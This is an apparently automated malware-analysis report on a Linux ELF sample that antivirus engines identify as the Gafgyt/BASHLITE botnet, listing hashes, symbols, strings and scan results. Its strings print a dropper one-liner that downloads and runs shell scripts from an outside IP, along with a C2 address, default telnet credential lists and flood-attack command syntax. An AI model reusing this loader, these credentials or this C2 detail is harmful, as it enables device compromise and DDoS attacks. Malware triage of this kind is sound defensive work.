Report #3384 check_circle

Binary
ABI
ELFOSABI_SYSV
Size
81.35KB
Type
ET_DYN
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
c9c03e18c3fcb8a5f84fc6910a16a533
sha1
932639a5f0c99a60a3f867c06cadb1cdd1f8c1be
crc32
0x4278d51e
sha224
3d2083e610c74ada4ba726485615198ae5fe2abffe52c767315e690b
sha256
043f57ddc3d6e2f1baa5968571d4fadbd95adaa7287a828b895943a7223fa9ed
sha384
829614405dd21fb085afab897ab4d841f23c1a0e9d23af1ff8b9e97c9a5103cab393c22d98e42af5aac5603aa6ecbe01
sha512
87cd3989979dceb5355f2b687ff4c45e426cafc738f0f5a559a0b726be4a6378b36ef24d15955a270a9838b25a27bdffc5a1538ec7b773c4b0c42821784bda7e
ssdeep
1536:fltXw90+a0Al1UaCDWc7dhQ8/JAvNCq6uEJ:d1wYz1U/DWc7dhQ8/JWN
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
url, IP, domain, contentis_base64, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo, /proc/net/route
Password

Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
173.212.226.176:1665, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.189.171.210/rgt.sh; chmod +x rgt.sh; sh rgt.sh; tftp 5.189.171.210 -c get bgr1.sh; chmod +x bgr1.sh; sh bgr1.sh; tftp -r bgr2.sh -g 5.189.171.210; chmod +x bgr2.sh; sh bgr2.sh; ftpget -u ftp 5.189.171.210 rgt1.sh rgt1.sh; chmod +x rgt1.sh; sh rgt1.sh; rm -rf rgt.sh bgr1.sh bgr2.sh rgt1.sh
URLs
/lib/ld-linux.so.2, libpthread.so.0, cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.189.171.210/rgt.sh; chmod +x rgt.sh; sh rgt.sh; tftp 5.189.171.210 -c get bgr1.sh; chmod +x bgr1.sh; sh bgr1.sh; tftp -r bgr2.sh -g 5.189.171.210; chmod +x bgr2.sh; sh bgr2.sh; ftpget -u ftp 5.189.171.210 rgt1.sh rgt1.sh; chmod +x rgt1.sh; sh rgt1.sh; rm -rf rgt.sh bgr1.sh bgr2.sh rgt1.sh, GET rgt.sh
Mails

Suspicious
True check_circle
Strings
List
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.189.171.210/rgt.sh; chmod +x rgt.sh; sh rgt.sh; tftp 5.189.171.210 -c get bgr1.sh; chmod +x bgr1.sh; sh bgr1.sh; tftp -r bgr2.sh -g 5.189.171.210; chmod +x bgr2.sh; sh bgr2.sh; ftpget -u ftp 5.189.171.210 rgt1.sh rgt1.sh; chmod +x rgt1.sh; sh rgt1.sh; rm -rf rgt.sh bgr1.sh bgr2.sh rgt1.sh
.note.gnu.build-id
.plt.got
173.212.226.176:1665
__x86.get_pc_thunk.cx
__x86.get_pc_thunk.ax
GET rgt.sh
.gnu.hash
libc.so.6
/etc/rc.conf
.got.plt
.rel.plt
.rel.dyn
0.0.0.0
/lib/ld-linux.so.2
None Killed.
Killed %d.
libpthread.so.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
contains_fail
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
TELNET LOGIN CRACKED - %s:%s:%s
Telnet'd %s|%s|%s|23
pass
fork failed
pass
infected
unctelnet %s|%s|%s|23
REPORT %s:%s:%s
Version: %d.%d
Range %d->%d
>%s.t && cd %s ; >retrieve
My IP: %s
FUK YEA I DO (%s)
Invalid flag "%s"
8.8.8.8
My Public IP: %s
TEST %s
BUILD %s
BUILD %s
pipe@@GLIBC_2.0
kill@@GLIBC_2.0
PONG!
_Jv_RegisterClasses
_Jv_RegisterClasses
get_telstate_host
socket_connect
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
deregister_tm_clones
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
VIEWPAGE <http ip url>
admin1234
admin123
sendHTTP2
sendHTTP
tcpcsum
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve
PONG
7ujMko0admin
commServer
SCAN <threads> <timeout>
inet_addr
/boot/
INFECTION SUCCESS - %s:%s:%s
currentServer
useragents
FAILED TO INFECT - %s:%s:%s
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
makeIPPacket
usernames
KILLATTK
administrator
Administrator
password
sendTCP
smcadmin
gethostbyname
gethostbyname
processCmd
passwords
KILLSUB
UDP <target> <port (0 for random)> <time> <netmask> <packet size> <poll interval> <sleep check> <sleep time(ms)>
getHost
usleep@@GLIBC_2.0
socket@@GLIBC_2.0
execl@@GLIBC_2.0
admin2
connect
connect

Symbols
List
crtstuff.c, __JCR_LIST__, deregister_tm_clones, register_tm_clones, __do_global_dtors_aux, completed.6578, __do_global_dtors_aux_fini_array_entry, frame_dummy, __frame_dummy_init_array_entry, test2.c, Q, c, i.5070, printchar, prints, printi, print, fdopen_pids, hextable, ipState, .L322, .L324, .L325, .L326, .L327, .L328, .L329, .L330, .L331, crtstuff.c, __FRAME_END__, __JCR_END__, __init_array_end, _DYNAMIC, __init_array_start, __GNU_EH_FRAME_HDR, _GLOBAL_OFFSET_TABLE_, setsockopt@@GLIBC_2.0, __libc_csu_fini, sendTCP, dup2@@GLIBC_2.0, strstr@@GLIBC_2.0, gotIP, contains_success, strcmp@@GLIBC_2.0, useragents, tmpdirs, read@@GLIBC_2.0, sclose, _ITM_deregisterTMCloneTable, __x86.get_pc_thunk.bx, data_start, dupppp, processCmd, printf@@GLIBC_2.0, rangesA, versionnnn, readUntil, read_with_timeout, _exit@@GLIBC_2.0, sigprocmask@@GLIBC_2.0, free@@GLIBC_2.0, mainCommSock, memcpy@@GLIBC_2.0, csum, contains_response, bzero@@GLIBC_2.0, fgets@@GLIBC_2.0, StartTheLelz, isspace@@GLIBC_2.0, advances2, _edata, spoofTest, read_until_response, fclose@@GLIBC_2.1, time@@GLIBC_2.0, inet_ntoa@@GLIBC_2.0, currentServer, contains_string, recvLine, getRandomPublicIP, signal@@GLIBC_2.0, getRandomPublicIPA, sleep@@GLIBC_2.0, select@@GLIBC_2.0, chdir@@GLIBC_2.0, listFork, _fini, getRandomPublicIPC, infectedmessage, advance_state, macAddress, subversionnnn, sendSTD, usernames, pids, htons@@GLIBC_2.0, trim, fdpopen, initConnection, getsockopt@@GLIBC_2.0, __x86.get_pc_thunk.dx, ioctl@@GLIBC_2.0, sendHTTP2, fdpclose, fdgets, rangesB1, __cxa_finalize@@GLIBC_2.1.3, sendCNC, perror@@GLIBC_2.0, bcopy@@GLIBC_2.0, waitpid@@GLIBC_2.0, passwords, usleep@@GLIBC_2.0, strcat@@GLIBC_2.0, strcpy@@GLIBC_2.0, getpid@@GLIBC_2.0, ourPublicIP, reset_telstate, malloc@@GLIBC_2.0, __data_start, getBuild, system@@GLIBC_2.0, ntohl@@GLIBC_2.0, getdtablesize@@GLIBC_2.0, rangesC2, __gmon_start__, exit@@GLIBC_2.0, kill@@GLIBC_2.0, makeRandomStr, __dso_handle, open@@GLIBC_2.0, socket_connect, _IO_stdin_used, getHost, setsid@@GLIBC_2.0, feof@@GLIBC_2.0, srand@@GLIBC_2.0, strchr@@GLIBC_2.0, getcwd@@GLIBC_2.0, szprintf, strlen@@GLIBC_2.0, ourIP, __libc_start_main@@GLIBC_2.0, write@@GLIBC_2.0, oldranges, strcasecmp@@GLIBC_2.0, __libc_csu_init, fcntl@@GLIBC_2.0, sigaddset@@GLIBC_2.0, uppercase, fopen@@GLIBC_2.1, memset@@GLIBC_2.0, snprintf@@GLIBC_2.0, sendHTTP, _end, __errno_location@@GLIBC_2.0, getOurIP, fails, strncpy@@GLIBC_2.0, _start, makeIPPacket, _fp_hw, numpids, prctl@@GLIBC_2.0, herror@@GLIBC_2.0, infected, execl@@GLIBC_2.0, sockprintf, pipe@@GLIBC_2.0, rand@@GLIBC_2.0, getRandomPublicIP2, wildString, sendUDP, vfork@@GLIBC_2.0, __bss_start, tcpcsum, main, __x86.get_pc_thunk.ax, sendto@@GLIBC_2.0, strtok@@GLIBC_2.0, getBogos, contains_fail, fork@@GLIBC_2.0, sigemptyset@@GLIBC_2.0, getRandomPublicIPB, htonl@@GLIBC_2.0, toupper@@GLIBC_2.0, findARandomIP, rand_cmwc, zprintf, _Jv_RegisterClasses, strcasestr@@GLIBC_2.1, getsockname@@GLIBC_2.0, init_rand, parseHex, connectTimeout, sprintf@@GLIBC_2.0, advances, rangesB2, atoi@@GLIBC_2.0, matchPrompt, getCores, rangechoice, socket@@GLIBC_2.0, __TMC_END__, _ITM_registerTMCloneTable, scanPid, get_telstate_host, inet_addr@@GLIBC_2.0, negotiate, rangesC3, gethostbyname@@GLIBC_2.0, successes, shutdown@@GLIBC_2.0, fputs@@GLIBC_2.0, connect@@GLIBC_2.0, _init, commServer, recv@@GLIBC_2.0, echoLoader, close@@GLIBC_2.0, rangesC1, __x86.get_pc_thunk.cx, oldranges2, infect, contains_infectmessage, send@@GLIBC_2.0, getRandomIP
Number
258
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .interp, .note.ABI-tag, .note.gnu.build-id, .gnu.hash, .dynsym, .dynstr, .gnu.version, .gnu.version_r, .rel.dyn, .rel.plt, .init, .plt, .plt.got, .text, .fini, .rodata, .eh_frame_hdr, .eh_frame, .init_array, .fini_array, .jcr, .dynamic, .got, .got.plt, .data, .bss, .comment, .symtab, .strtab, .shstrtab
Number
31
Suspicious
False cancel
Segments
Number
9
Suspicious
False cancel
Compilers
List
GCC: (Debian 6.3.0-18) 6.3.0 20170516
Identified
1
Suspicious
False cancel
Functions
List
, , setsockopt, @GLIBC_2.0 (2), dup2, @GLIBC_2.0 (2), strstr, @GLIBC_2.0 (2), strcmp, @GLIBC_2.0 (2), read, @GLIBC_2.0 (3), _ITM_deregisterTMCloneTable, , printf, @GLIBC_2.0 (2), _exit, @GLIBC_2.0 (2), sigprocmask, @GLIBC_2.0 (2), free, @GLIBC_2.0 (2), memcpy, @GLIBC_2.0 (2), bzero, @GLIBC_2.0 (2), fgets, @GLIBC_2.0 (2), isspace, @GLIBC_2.0 (2), fclose, @GLIBC_2.1 (4), time, @GLIBC_2.0 (2), inet_ntoa, @GLIBC_2.0 (2), signal, @GLIBC_2.0 (2), sleep, @GLIBC_2.0 (2), select, @GLIBC_2.0 (2), chdir, @GLIBC_2.0 (2), htons, @GLIBC_2.0 (2), getsockopt, @GLIBC_2.0 (2), ioctl, @GLIBC_2.0 (2), __cxa_finalize, @GLIBC_2.1.3 (5), perror, @GLIBC_2.0 (2), bcopy, @GLIBC_2.0 (2), waitpid, @GLIBC_2.0 (3), usleep, @GLIBC_2.0 (2), strcat, @GLIBC_2.0 (2), strcpy, @GLIBC_2.0 (2), getpid, @GLIBC_2.0 (2), malloc, @GLIBC_2.0 (2), system, @GLIBC_2.0 (2), ntohl, @GLIBC_2.0 (2), getdtablesize, @GLIBC_2.0 (2), __gmon_start__, , exit, @GLIBC_2.0 (2), kill, @GLIBC_2.0 (2), open, @GLIBC_2.0 (3), setsid, @GLIBC_2.0 (2), feof, @GLIBC_2.0 (2), srand, @GLIBC_2.0 (2), strchr, @GLIBC_2.0 (2), getcwd, @GLIBC_2.0 (2), strlen, @GLIBC_2.0 (2), __libc_start_main, @GLIBC_2.0 (2), write, @GLIBC_2.0 (3), strcasecmp, @GLIBC_2.0 (2), fcntl, @GLIBC_2.0 (3), sigaddset, @GLIBC_2.0 (2), fopen, @GLIBC_2.1 (4), memset, @GLIBC_2.0 (2), snprintf, @GLIBC_2.0 (2), __errno_location, @GLIBC_2.0 (3), strncpy, @GLIBC_2.0 (2), prctl, @GLIBC_2.0 (2), herror, @GLIBC_2.0 (2), execl, @GLIBC_2.0 (2), pipe, @GLIBC_2.0 (2), rand, @GLIBC_2.0 (2), vfork, @GLIBC_2.0 (2), sendto, @GLIBC_2.0 (3), strtok, @GLIBC_2.0 (2), fork, @GLIBC_2.0 (2), sigemptyset, @GLIBC_2.0 (2), htonl, @GLIBC_2.0 (2), toupper, @GLIBC_2.0 (2), _Jv_RegisterClasses, , strcasestr, @GLIBC_2.1 (4), getsockname, @GLIBC_2.0 (2), sprintf, @GLIBC_2.0 (2), atoi, @GLIBC_2.0 (2), socket, @GLIBC_2.0 (2), _ITM_registerTMCloneTable, , inet_addr, @GLIBC_2.0 (2), gethostbyname, @GLIBC_2.0 (2), shutdown, @GLIBC_2.0 (2), fputs, @GLIBC_2.0 (2), connect, @GLIBC_2.0 (3), recv, @GLIBC_2.0 (3), close, @GLIBC_2.0 (3), send, @GLIBC_2.0 (3), main, , _IO_stdin_used, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , crtstuff.c, , __JCR_LIST__, , deregister_tm_clones, , register_tm_clones, , __do_global_dtors_aux, , completed.6578, , __do_global_dtors_aux_fini_array_entry, , frame_dummy, , __frame_dummy_init_array_entry, , test2.c, , Q, , c, , i.5070, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , .L322, , .L324, , .L325, , .L326, , .L327, , .L328, , .L329, , .L330, , .L331, , crtstuff.c, , __FRAME_END__, , __JCR_END__, , , , __init_array_end, , _DYNAMIC, , __init_array_start, , __GNU_EH_FRAME_HDR, , _GLOBAL_OFFSET_TABLE_, , setsockopt@@GLIBC_2.0, , __libc_csu_fini, , sendTCP, , dup2@@GLIBC_2.0, , strstr@@GLIBC_2.0, , gotIP, , contains_success, , strcmp@@GLIBC_2.0, , useragents, , tmpdirs, , read@@GLIBC_2.0, , sclose, , _ITM_deregisterTMCloneTable, , __x86.get_pc_thunk.bx, , data_start, , dupppp, , processCmd, , printf@@GLIBC_2.0, , rangesA, , versionnnn, , readUntil, , read_with_timeout, , _exit@@GLIBC_2.0, , sigprocmask@@GLIBC_2.0, , free@@GLIBC_2.0, , mainCommSock, , memcpy@@GLIBC_2.0, , csum, , contains_response, , bzero@@GLIBC_2.0, , fgets@@GLIBC_2.0, , StartTheLelz, , isspace@@GLIBC_2.0, , advances2, , _edata, , spoofTest, , read_until_response, , fclose@@GLIBC_2.1, , time@@GLIBC_2.0, , inet_ntoa@@GLIBC_2.0, , currentServer, , contains_string, , recvLine, , getRandomPublicIP, , signal@@GLIBC_2.0, , getRandomPublicIPA, , sleep@@GLIBC_2.0, , select@@GLIBC_2.0, , chdir@@GLIBC_2.0, , listFork, , _fini, , getRandomPublicIPC, , infectedmessage, , advance_state, , macAddress, , subversionnnn, , sendSTD, , usernames, , pids, , htons@@GLIBC_2.0, , trim, , fdpopen, , initConnection, , getsockopt@@GLIBC_2.0, , __x86.get_pc_thunk.dx, , ioctl@@GLIBC_2.0, , sendHTTP2, , fdpclose, , fdgets, , rangesB1, , __cxa_finalize@@GLIBC_2.1.3, , sendCNC, , perror@@GLIBC_2.0, , bcopy@@GLIBC_2.0, , waitpid@@GLIBC_2.0, , passwords, , usleep@@GLIBC_2.0, , strcat@@GLIBC_2.0, , strcpy@@GLIBC_2.0, , getpid@@GLIBC_2.0, , ourPublicIP, , reset_telstate, , malloc@@GLIBC_2.0, , __data_start, , getBuild, , system@@GLIBC_2.0, , ntohl@@GLIBC_2.0, , getdtablesize@@GLIBC_2.0, , rangesC2, , __gmon_start__, , exit@@GLIBC_2.0, , kill@@GLIBC_2.0, , makeRandomStr, , __dso_handle, , open@@GLIBC_2.0, , socket_connect, , _IO_stdin_used, , getHost, , setsid@@GLIBC_2.0, , feof@@GLIBC_2.0, , srand@@GLIBC_2.0, , strchr@@GLIBC_2.0, , getcwd@@GLIBC_2.0, , szprintf, , strlen@@GLIBC_2.0, , ourIP, , __libc_start_main@@GLIBC_2.0, , write@@GLIBC_2.0, , oldranges, , strcasecmp@@GLIBC_2.0, , __libc_csu_init, , fcntl@@GLIBC_2.0, , sigaddset@@GLIBC_2.0, , uppercase, , fopen@@GLIBC_2.1, , memset@@GLIBC_2.0, , snprintf@@GLIBC_2.0, , sendHTTP, , _end, , __errno_location@@GLIBC_2.0, , getOurIP, , fails, , strncpy@@GLIBC_2.0, , _start, , makeIPPacket, , _fp_hw, , numpids, , prctl@@GLIBC_2.0, , herror@@GLIBC_2.0, , infected, , execl@@GLIBC_2.0, , sockprintf, , pipe@@GLIBC_2.0, , rand@@GLIBC_2.0, , getRandomPublicIP2, , wildString, , sendUDP, , vfork@@GLIBC_2.0, , __bss_start, , tcpcsum, , main, , __x86.get_pc_thunk.ax, , sendto@@GLIBC_2.0, , strtok@@GLIBC_2.0, , getBogos, , contains_fail, , fork@@GLIBC_2.0, , sigemptyset@@GLIBC_2.0, , getRandomPublicIPB, , htonl@@GLIBC_2.0, , toupper@@GLIBC_2.0, , findARandomIP, , rand_cmwc, , zprintf, , _Jv_RegisterClasses, , strcasestr@@GLIBC_2.1, , getsockname@@GLIBC_2.0, , init_rand, , parseHex, , connectTimeout, , sprintf@@GLIBC_2.0, , advances, , rangesB2, , atoi@@GLIBC_2.0, , matchPrompt, , getCores, , rangechoice, , socket@@GLIBC_2.0, , __TMC_END__, , _ITM_registerTMCloneTable, , scanPid, , get_telstate_host, , inet_addr@@GLIBC_2.0, , negotiate, , rangesC3, , gethostbyname@@GLIBC_2.0, , successes, , shutdown@@GLIBC_2.0, , fputs@@GLIBC_2.0, , connect@@GLIBC_2.0, , _init, , commServer, , recv@@GLIBC_2.0, , echoLoader, , close@@GLIBC_2.0, , rangesC1, , __x86.get_pc_thunk.cx, , oldranges2, , infect, , contains_infectmessage, , send@@GLIBC_2.0, , getRandomIP,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x1ac0
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
9
Offset
52
Section Header
Size
40
Number
31
Offset
82064
AVclass
gafgyt
1
VirusTotal
md5
c9c03e18c3fcb8a5f84fc6910a16a533
sha1
932639a5f0c99a60a3f867c06cadb1cdd1f8c1be
SCANS (DETECTION RATE = 36.21%)
AVG
result: ELF:Gafgyt-AG [Trj]
update: 20170711
version: 8.0.1489.320
detected: True check_circle

CMC
update: 20170711
version: 1.1.0.977
detected: False cancel

MAX
result: malware (ai score=89)
update: 20170711
version: 2017.6.26.1
detected: True check_circle

Bkav
update: 20170711
version: 1.3.0.9188
detected: False cancel

K7GW
update: 20170711
version: 10.17.23935
detected: False cancel

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170711
version: 1.0.1.9
detected: True check_circle

Avast
result: ELF:Gafgyt-AG [Trj]
update: 20170711
version: 8.0.1489.320
detected: True check_circle

Avira
update: 20170711
version: 8.3.3.4
detected: False cancel

Baidu
update: 20170710
version: 1.0.0.2
detected: False cancel

Cyren
update: 20170711
version: 5.4.30.7
detected: False cancel

DrWeb
result: Linux.BackDoor.Fgt.719
update: 20170711
version: 7.0.28.2020
detected: True check_circle

GData
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170711
version: A:25.13319B:25.9974
detected: True check_circle

Panda
update: 20170711
version: 4.6.4.2
detected: False cancel

VBA32
update: 20170711
version: 3.12.26.4
detected: False cancel

VIPRE
update: 20170711
version: 59452
detected: False cancel

Zoner
update: 20170711
version: 1.0
detected: False cancel

AVware
update: 20170711
version: 1.5.0.42
detected: False cancel

ClamAV
update: 20170710
version: 0.99.2.0
detected: False cancel

Comodo
update: 20170711
version: 27436
detected: False cancel

F-Prot
update: 20170711
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Gafgyt
update: 20170711
version: 0.1.5.2
detected: True check_circle

McAfee
update: 20170711
version: 6.0.6.653
detected: False cancel

Rising
result: Backdoor.Gafgyt/Linux!1.A512 (classic)
update: 20170711
version: 25.0.0.1
detected: True check_circle

Sophos
result: Linux/DDoS-BI
update: 20170711
version: 4.98.0
detected: True check_circle

Yandex
update: 20170710
version: 5.5.1.3
detected: False cancel

Zillya
update: 20170711
version: 2.0.0.3332
detected: False cancel

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20170711
version: 1.0.0.817
detected: True check_circle

Tencent
update: 20170711
version: 1.0.0.1
detected: False cancel

ViRobot
update: 20170711
version: 2014.3.20.0
detected: False cancel

Webroot
update: 20170711
version: 1.0.0.207
detected: False cancel

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170711
version: 3.0.3.1010
detected: True check_circle

AegisLab
update: 20170711
version: 4.2
detected: False cancel

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20170711
version: 4.0.1.883
detected: True check_circle

F-Secure
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170711
version: 11.0.19100.45
detected: True check_circle

Fortinet
result: Linux/Gafgyt.B!tr
update: 20170629
version: 5.4.247.0
detected: True check_circle

Jiangmin
update: 20170711
version: 16.0.100
detected: False cancel

Kingsoft
update: 20170711
version: 2013.8.14.323
detected: False cancel

Symantec
update: 20170711
version: 1.4.0.0
detected: False cancel

nProtect
update: 20170711
version: 2017-07-11.02
detected: False cancel

AhnLab-V3
update: 20170711
version: 3.9.1.17914
detected: False cancel

Antiy-AVL
update: 20170711
version: 3.0.0.1
detected: False cancel

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20170711
version: 15.0.1.13
detected: True check_circle

Microsoft
result: DDoS:Linux/Lightaidra
update: 20170711
version: 1.1.13903.0
detected: True check_circle

Qihoo-360
update: 20170711
version: 1.0.0.1120
detected: False cancel

TheHacker
update: 20170709
version: 6.8.0.5.1718
detected: False cancel

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20170711
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20170711
version: 15727
detected: True check_circle

TrendMicro
update: 20170711
version: 9.862.0.1074
detected: False cancel

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170711
version: 7.2
detected: True check_circle

K7AntiVirus
update: 20170711
version: 10.17.23937
detected: False cancel

Malwarebytes
update: 20170711
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20170711
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20170711
version: 14.00
detected: False cancel

NANO-Antivirus
update: 20170711
version: 1.0.76.17587
detected: False cancel

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170711
version: 12.0.250.0
detected: True check_circle

SUPERAntiSpyware
update: 20170711
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
update: 20170711
version: v2015
detected: False cancel

TrendMicro-HouseCall
result: Linux_BASHLITE.SMJ1
update: 20170711
version: 9.950.0.1006
detected: True check_circle

total
58
sha256
043f57ddc3d6e2f1baa5968571d4fadbd95adaa7287a828b895943a7223fa9ed
scan_id
043f57ddc3d6e2f1baa5968571d4fadbd95adaa7287a828b895943a7223fa9ed-1499774436
resource
c9c03e18c3fcb8a5f84fc6910a16a533
positives
21
scan_date
2017-07-11 12:00:36
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291execve"./malware"["./malware"] -1 ENOENT (No such file or directory)
4291write2"strace: exec: No such file or di"...40 40
4291exit_group1 ?

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True check_circle

DNS
Query

Response

TCP
Info

UDP
Info

HTTP
Info

Summary
DNS
False cancel

TCP
False cancel

UDP
False cancel

HTTP
False cancel

Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 91.52%
suspicious: True check_circle
SVM
confidence: 93.09%
suspicious: True check_circle
Add to Collection
Download